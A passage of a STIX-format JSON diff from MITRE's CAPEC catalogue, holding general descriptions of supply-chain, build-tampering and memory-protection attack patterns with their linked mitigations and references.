"course-of-action--514cd9bd-12f1-4cf8-9093-4f575517aa3b", + "spec_version": "2.1", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Malware is inserted in a server motherboard (e.g., in the flash memory) in order to alter server functionality from that intended. 
The development environment or hardware/software support activity environment is susceptible to an adversary inserting malicious software into hardware components during development or update.\n ", + "external_references": [ + { + "external_id": "CAPEC-677", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/677.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": " Kaspersky Finds Sophisticated UEFI Malware in the Wild , 2020--10---05, ExtremeTech ", + "external_id": "REF-685", + "source_name": "reference_from_CAPEC", + "url": " https://www.extremetech.com/computing/315860-kaspersky-finds-sophisticated-uefi-malware-in-the-wild" + } + ], + "id": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Server Motherboard Compromise", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e" + ], + "x_capec_consequences": { + "Integrity": [ 
+ "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Malware is inserted into the Unified Extensible Firmware Interface (UEFI) software that resides on a flash memory chip soldered to a computer’s motherboard. It is the first thing to turn on when a system is booted and is allowed access to almost every part of the operating system. Hence, the malware will have extensive control over operating system functions and persist after system reboots. [REF-685]\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary with access to hardware/software processes and tools within the development or hardware/software support environment can insert malicious software into hardware components during development or update/maintenance." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Purchase IT systems, components and parts from government approved vendors whenever possible.", + "id": "course-of-action--c1be3529-9fb7-40a8-a6eb-097c4e1a3933", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cec1097b-0d23-4a54-9ae9-64654e393f3d", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c1be3529-9fb7-40a8-a6eb-097c4e1a3933", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Establish diversity among suppliers.", + "id": "course-of-action--9dd6990e-28bb-4e3f-9efd-11084ccef57d", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--864c9da9-4c92-4cea-9641-e0a25d17486e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9dd6990e-28bb-4e3f-9efd-11084ccef57d", + "spec_version": "2.1", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Conduct rigorous threat assessments of suppliers.", + "id": "course-of-action--a3848e81-2458-40d9-b92b-21aed1a69465", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--956e89e4-8b30-4e89-aed9-b592c0de779b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--a3848e81-2458-40d9-b92b-21aed1a69465", + "spec_version": "2.1", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Require that Bills of Material (BoM) for critical parts and components be certified.", + "id": "course-of-action--19824486-f485-41ff-bdbf-70e7555d7a3b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4da5652f-279d-465c-876f-f61e2bd78e19", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--19824486-f485-41ff-bdbf-70e7555d7a3b", + "spec_version": "2.1", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize contract language requiring contractors and subcontractors to flow down to subcontractors and suppliers SCRM and SCRA (Supply Chain Risk Assessment) requirements.", + "id": "course-of-action--9e2b4607-57c1-423b-8b87-1ca72b6669b9", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + 
"created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d6678ab4-13ee-4393-9302-f1f849c12afd", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9e2b4607-57c1-423b-8b87-1ca72b6669b9", + "spec_version": "2.1", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Establish trusted supplier networks.", + "id": "course-of-action--d8534e9f-4499-45e3-9ae1-85cf37f54f1c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9b49a971-d419-4828-b65f-13ac15c90fd6", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d8534e9f-4499-45e3-9ae1-85cf37f54f1c", + "spec_version": "2.1", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n During the system build process, the system is deliberately misconfigured by the alteration of the build data. 
Access to system configuration data files and build processes is susceptible to deliberate misconfiguration of the system.\n ", + "external_references": [ + { + "external_id": "CAPEC-678", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/678.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + } + ], + "id": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "modified": "2023-01-24T00:00:00.000Z", + "name": "System Build Data Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Modify Data", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n ‘Make’ is a program used for building executable programs and libraries from source code by 
executing commands and following rules in a ‘makefile’. It can create a malicious executable if commands or dependency paths in the makefile are maliciously altered to execute an unwanted command or reference as a dependency maliciously altered code.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary has access to the data files and processes used for executing system configuration and performing the build." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement configuration management security practices that protect the integrity of software and associated data.", + "id": "course-of-action--d984401e-2a31-4aab-af29-a41a5cbc9c1c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--869d19dd-b471-4f89-b47b-0183ac8dc878", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d984401e-2a31-4aab-af29-a41a5cbc9c1c", + "spec_version": "2.1", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor and control access to the configuration management system.", + "id": "course-of-action--167812bc-7a9b-4800-ae3e-5bb696d54905", + "modified": 
"2023-01-24T00:00:00.000Z", + "name": "coa-678-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8a21325b-976e-41b0-b832-ff513fd781d8", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--167812bc-7a9b-4800-ae3e-5bb696d54905", + "spec_version": "2.1", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Harden centralized repositories against attack.", + "id": "course-of-action--d5f02498-2cb3-41af-9a58-79e54dfd1108", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cb0dbc9b-c7a5-4f9d-982c-b0f25445ecca", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d5f02498-2cb3-41af-9a58-79e54dfd1108", + "spec_version": "2.1", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + 
"description": "Establish acceptance criteria for configuration management check-in to assure integrity.", + "id": "course-of-action--177c82cf-28a6-4bec-ad88-7f539639ef51", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--002a4543-59cc-405d-b6f7-835ee0f6b124", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--177c82cf-28a6-4bec-ad88-7f539639ef51", + "spec_version": "2.1", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Plan for and audit the security of configuration management administration processes.", + "id": "course-of-action--8933af3c-bb36-4306-b04a-c9d575f6ceae", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0868754c-7cfa-484b-914c-804bad2eccd0", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8933af3c-bb36-4306-b04a-c9d575f6ceae", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain configuration control over operational systems.", + "id": "course-of-action--71fca30c-ceb8-451f-9299-3c9b1b83d9ae", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--950b2aca-4816-440a-b10e-52af4e8d7a6b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--71fca30c-ceb8-451f-9299-3c9b1b83d9ae", + "spec_version": "2.1", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary takes advantage of missing or incorrectly configured access control within memory to read/write data or inject malicious code into said memory.\n ", + "external_references": [ + { + "external_id": "CAPEC-679", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/679.html" + }, + { + "external_id": "CWE-1222", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1222.html" + }, + { + "external_id": "CWE-1252", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1252.html" + }, + { + "external_id": "CWE-1257", + "source_name": "cwe", + "url": 
"http://cwe.mitre.org/data/definitions/1257.html" + }, + { + "external_id": "CWE-1260", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1260.html" + }, + { + "external_id": "CWE-1274", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1274.html" + }, + { + "external_id": "CWE-1282", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1282.html" + }, + { + "external_id": "CWE-1312", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1312.html" + }, + { + "external_id": "CWE-1316", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1316.html" + }, + { + "external_id": "CWE-1326", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1326.html" + }, + { + "description": "Cortex-R4 Manual, ARM", + "external_id": "REF-687", + "source_name": "reference_from_CAPEC", + "url": "https://developer.arm.com/ip-products/processors/cortex-m/cortex-m4" + }, + { + "description": "Testing for NoSQL Injection, The OWASP Foundation", + "external_id": "REF-668", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection" + }, + { + "description": "Memory Protection Unit (MPU), ARM", + "external_id": "REF-689", + "source_name": "reference_from_CAPEC", + "url": "https://static.docs.arm.com/100699/0100/armv8m_architecture_memory_protection_unit_100699_0100_00_en.pdf" + }, + { + "description": "Christopher Domas, The Memory Sinkhole, 2015--07---20", + "external_id": "REF-690", + "source_name": "reference_from_CAPEC", + "url": "https://github.com/xoreaxeaxeax/sinkhole/blob/master/us-15-Domas-TheMemorySinkhole-wp.pdf" + }, + { + "description": "Address Range Memory Mirroring, 2016--07---13, Taku Izumi, Fujitsu Limited", + "external_id": "REF-691", + "source_name": "reference_from_CAPEC", + "url": 
"https://www.fujitsu.com/jp/documents/products/software/os/linux/catalog/LinuxConJapan2016-Izumi.pdf" + }, + { + "description": "Yuriy Bulygin, Oleksandr Bazhaniuk, Andrew Furtak, John Loucaides, Mikhail Gorobets, BARing the System – New vulnerabilities in Coreboot & UEFI-based Systems, 2017", + "external_id": "REF-692", + "source_name": "reference_from_CAPEC", + "url": "https://www.c7zero.info/stuff/REConBrussels2017_BARing_the_system.pdf" + } + ], + "id": "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Exploitation of Improperly Configured or Implemented Memory Protections", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Hardware", + "Hardware" + ], + "x_capec_example_instances": [ + "\n A hardware product contains non-volatile memory, which itself contains boot code that is insufficiently protected. An adversary then modifies this memory to either bypass the secure boot process or to execute their own code.\n ", + "\n A hardware product leverages a CPU that does not possess a memory-protection unit (MPU) and a memory-management unit (MMU) nor a special bit to support write exclusivity, resulting in no write exclusivity. 
Because of this, an adversary is able to inject malicious code into the memory and later execute it to achieve the desired outcome.\n " + ], + "x_capec_extended_description": "\n Hardware product designs often need to implement memory protection features to prevent users from reading and modifying memory reserved for security operations such as secure booting, authenticating code, device attestation, and more. However, these protection features may be missing if not configured by developers. For example, this can occur if the developers assume these features are configured elsewhere. Additionally, developers often attempt to impose proper protection features, but may incorrectly configure these controls. One such example would be setting controls with insufficient granularity for protected address regions. If an adversary is able to discover improper access controls surrounding memory, it could result in the adversary obtaining sensitive data, executing code, circumventing security mechanisms, escalating privileges, or even denying service to higher privilege software.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the hardware being leveraged." + ], + "x_capec_skills_required": { + "High": "Intricate knowledge of memory structures.", + "Medium": "Ability to craft malicious code to inject into the memory region." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that protected and unprotected memory ranges are isolated and do not overlap.", + "id": "course-of-action--d8644789-b5aa-430b-ba1a-8debdc9b27e0", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-679-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--93b182a2-5d09-46dc-a864-f76e8794dbc0", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d8644789-b5aa-430b-ba1a-8debdc9b27e0", + "spec_version": "2.1", + "target_ref": "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If memory regions must overlap, leverage memory priority schemes if memory regions can overlap.", + "id": "course-of-action--e00eb22c-824b-42c4-bbeb-869936a1019e", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-679-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3c6a1cf7-f17e-41e5-a34a-c559ed3bab78", + "modified": "2021-10-21T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e00eb22c-824b-42c4-bbeb-869936a1019e", + "spec_version": "2.1", + "target_ref": "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that original and mirrored memory regions apply the same protections.", + "id": "course-of-action--a95b7f45-adeb-4411-b4f1-92dec47a8028", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-679-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--40599fe1-c651-4840-8670-ea221031fd9b", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a95b7f45-adeb-4411-b4f1-92dec47a8028", + "spec_version": "2.1", + "target_ref": "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure immutable code or data is programmed into ROM or write-once memory.", + "id": "course-of-action--861bcbd5-8263-435d-83cd-98b7a1297980", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-679-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": 
"2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b1b7b572-66d6-497f-9534-70a94507d789", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--861bcbd5-8263-435d-83cd-98b7a1297980", + "spec_version": "2.1", + "target_ref": "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Many languages use code signing facilities to vouch for code's identity and to thus tie code to its assigned privileges within an environment. Subverting this mechanism can be instrumental in an attacker escalating privilege. Any means of subverting the way that a virtual machine enforces code signing classifies for this style of attack.", + "external_references": [ + { + "external_id": "CAPEC-68", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/68.html" + }, + { + "external_id": "CWE-325", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/325.html" + }, + { + "external_id": "CWE-328", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/328.html" + }, + { + "external_id": "CWE-1326", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1326.html" + }, + { + "description": "Subvert Trust Controls: Code Signing", + "external_id": "T1553.002", + "source_name": "ATTACK", 